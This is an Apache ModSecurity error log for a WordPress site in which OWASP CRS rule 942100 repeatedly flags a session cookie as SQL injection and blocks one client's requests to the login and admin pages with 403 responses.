[Mon May 11 22:26:43.760248 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7g3o_DFxNSZVmaX3QVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:43.760538 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7g3o_DFxNSZVmaX3QVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:44.304777 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7g3o_DFxNSZVmaX3QVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:45.622334 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7hXo_DFxNSZVmaX3QXQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:45.622728 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7hXo_DFxNSZVmaX3QXQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:46.208705 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7hXo_DFxNSZVmaX3QXQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:47.549226 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7h3o_DFxNSZVmaX3QZQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:47.549515 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7h3o_DFxNSZVmaX3QZQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:47.907909 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7h3o_DFxNSZVmaX3QZQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:49.045373 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7iXo_DFxNSZVmaX3QZwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:49.045656 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7iXo_DFxNSZVmaX3QZwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:49.711746 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7iXo_DFxNSZVmaX3QZwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:50.340780 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7ino_DFxNSZVmaX3QaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:50.341063 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7ino_DFxNSZVmaX3QaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:50.976571 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7ino_DFxNSZVmaX3QaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:51.638865 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7i3o_DFxNSZVmaX3QawAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:51.639168 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7i3o_DFxNSZVmaX3QawAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:52.262057 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7i3o_DFxNSZVmaX3QawAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:54.636721 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7jno_DFxNSZVmaX3QbgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:54.637014 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7jno_DFxNSZVmaX3QbgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:55.793871 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7jno_DFxNSZVmaX3QbgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:00.535528 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7lHo_DFxNSZVmaX3QfgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:00.535811 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7lHo_DFxNSZVmaX3QfgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:01.111322 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7lHo_DFxNSZVmaX3QfgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:04.735811 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7mHo_DFxNSZVmaX3QggAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:04.736256 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7mHo_DFxNSZVmaX3QggAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:05.099652 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7mHo_DFxNSZVmaX3QggAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:07.641231 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7m3o_DFxNSZVmaX3QhAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:07.641520 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7m3o_DFxNSZVmaX3QhAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:09.185266 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7m3o_DFxNSZVmaX3QhAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:09.434647 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7nXo_DFxNSZVmaX3QhgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:09.434937 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7nXo_DFxNSZVmaX3QhgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:10.082774 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7nXo_DFxNSZVmaX3QhgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:11.345635 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7n3o_DFxNSZVmaX3QiAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:11.345914 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7n3o_DFxNSZVmaX3QiAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:11.948264 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7n3o_DFxNSZVmaX3QiAAAAMg"], referer: https://rentparadise.fr/wp-login.php
